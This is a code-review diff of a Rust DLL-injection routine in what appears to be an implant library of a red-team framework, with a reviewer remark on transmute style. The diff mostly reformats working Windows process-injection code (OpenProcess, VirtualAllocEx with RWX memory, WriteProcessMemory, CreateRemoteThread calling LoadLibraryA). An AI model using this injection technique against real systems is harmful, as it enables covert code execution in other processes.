implants/lib/eldritch/src/sys/dll_inject_impl.rs

```diff
@@ -1,76 +1,74 @@
+    return Err(anyhow::anyhow!(
+        "This OS isn't supported by the dll_inject function.\nOnly windows systems are supported"
+    ));
     #[cfg(target_os = "windows")]
     unsafe {
-        let dll_path_null_terminated: String = format!("{}\0",dll_path);
+        let dll_path_null_terminated: String = format!("{}\0", dll_path);
 
         // Get the kernel32.dll base address
-        let h_kernel32 = GetModuleHandleA( "kernel32.dll\0".as_ptr() );
+        let h_kernel32 = GetModuleHandleA("kernel32.dll\0".as_ptr());
 
         // Get the address of the kernel function LoadLibraryA
-        let loadlibrary_function_ref = GetProcAddress(
-            h_kernel32, 
-            "LoadLibraryA\0".as_ptr()
-        ).unwrap();
+        let loadlibrary_function_ref =
+            GetProcAddress(h_kernel32, "LoadLibraryA\0".as_ptr()).unwrap();
 
         // Open a handle to the remote process
-        let target_process_memory_handle = OpenProcess(
-            PROCESS_ALL_ACCESS,
-            0,
-            pid
-        );
+        let target_process_memory_handle = OpenProcess(PROCESS_ALL_ACCESS, 0, pid);
 
         // Allocate memory in the remote process that we'll copy the DLL path string to.
         let target_process_allocated_memory_handle = VirtualAllocEx(
-            target_process_memory_handle, 
-            0 as *const c_void, 
-            dll_path_null_terminated.len()+1, 
-            MEM_RESERVE | MEM_COMMIT, 
-            PAGE_EXECUTE_READWRITE
+            target_process_memory_handle,
+            0 as *const c_void,
+            dll_path_null_terminated.len() + 1,
+            MEM_RESERVE | MEM_COMMIT,
+            PAGE_EXECUTE_READWRITE,
         );
 
         // Write the DLL path into the remote processes newly allocated memory
         let _write_proccess_memory_res = WriteProcessMemory(
-            target_process_memory_handle, 
-            target_process_allocated_memory_handle, 
-            dll_path_null_terminated.as_bytes().as_ptr() as *const c_void, 
-            dll_path_null_terminated.len(), 
-            0 as *mut usize
+            target_process_memory_handle,
+            target_process_allocated_memory_handle,
+            dll_path_null_terminated.as_bytes().as_ptr() as *const c_void,
+            dll_path_null_terminated.len(),
+            0 as *mut usize,
         );
 
         // Kickoff our DLL in the remote process
         let _remote_thread_return_val = CreateRemoteThread(
-            target_process_memory_handle, 
-            0 as *const SECURITY_ATTRIBUTES, 
-            0, 
-            Some( // Translate our existing function return to the one LoadLibraryA wants.
+            target_process_memory_handle,
+            0 as *const SECURITY_ATTRIBUTES,
+            0,
+            Some(
+                // Translate our existing function return to the one LoadLibraryA wants.
                 std::mem::transmute::<
```

Comment:
This is a little toxic to read but transmutes are in general.
If you have thoughts on beautifying this lmk otherwise it's okay.